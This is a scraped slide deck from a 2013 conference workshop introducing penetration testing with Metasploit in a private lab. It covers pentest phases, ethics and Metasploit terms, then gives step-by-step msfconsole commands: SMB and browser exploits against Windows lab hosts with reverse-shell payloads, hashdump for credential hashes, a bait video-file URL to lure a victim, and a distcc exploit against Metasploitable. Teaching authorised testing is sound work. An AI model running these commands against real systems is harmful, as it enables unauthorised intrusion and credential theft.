SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our User Agreement and Privacy Policy.
SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our Privacy Policy and User Agreement for details.
Successfully reported this slideshow.
Activate your 30 day free trial to unlock unlimited reading.
1.
PENETRATIONTESTINGAND
METASPLOITBASIC
Presented by
Syarif
!
Indonesia Creative Open Source Software ( ICrOSS ) 2013
Jakarta, April 25 2013
Balai Kartini
3.
Whoami
• Just me my self : http://fl3x.us ; @fl3xu5
• InfoSec Enthusiast & Trainer
• Lecture & Assistant Manager
• CyberCrime Investigator
4.
Why Pentest ?
• Millions of dollars have been invested in
security programs to protect critical
infrastructure to prevent data breaches *1)
• Penetration Test is one of the most
effective ways to identify weaknesses and
deficiencies in these programs *1)
5.
What’s Penetration Testing
• A method to evaluate the security of computer system / network
• Practice ( attacking ) an IT System like a ‘hacker’ does
• Find security holes ( weaknesses )
• Bypass security mechanism
• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
6.
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
7.
Pentest Phases
Vulnerability Analysis
Information Gathering
Exploitation
Post Exploitation
Reporting
8.
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
12.
What’s
• Not just a tool, but an entire framework *1)
• an Open source platform for writing
security tools and exploits *2)
• Easily build attack vectors to add its
exploits, payloads, encoders,
• Create and execute more advanced attack
• Ruby based
16.
Metasploit Terminology
• Exploit : code that allow a pentester take some advantages
of a flaw within system,application, or service *1)
• Payload : code that we want the target system to execute
( few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as payload when
exploitation occurs *1)
• Module : a software that can be used by metasploit *1)
• Listener : a component for waiting an incoming connection
*1)
17.
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run
2
3 Upload / Download data
18.
Traditional PentestVs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
19.
Meterpreter
• as a payload after vulnerability is exploited *1)
• Improve the post exploitation
20.
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
meterpreter shell
27.
Pentest Skenario
• Set network adapter : NAT
• Firewall & Windows update : OFF
• Fresh OS installed
!
• startx
28.
OS in the Lab
• BackTrack 5 R 3
• IP address : 172.16.150.169
• Windows Xp SP 2
• IP address : 172.16.150.165
• Windows 2003 Server
• IP address : 172.16.150.167
• Windows 7
• IP address : 172.16.150.170
• Ubuntu Linux 8.04 ( Metasploitable )
• IP address : 172.16.150.171
29.
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
30.
Windows XP Post Exploitation
• session -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
31.
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
32.
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
34.
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.150.171
• set lhost 172.16.150.169
• exploit
35.
Any Question ?
Contact me
• Website : http://fl3x.us
• Twitter : @fl3xu5
36.
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
37.
References
!
!
• 1. Metasploit The Penetration Tester’s Guide : David
Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-
unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/
PTES_Technical_Guidelines
38.
Challenge in 45 minutes :)
• ConnectYour Windows OS to TP LINK Access
Point over dhcp
• BackTrack 5R3VMWare setting :
• Network adapter : Bridge
• Get 4 Pictures by your self & shutdown the targets
( if you can :p )
• Win the Polo T-Shirt indobacktrack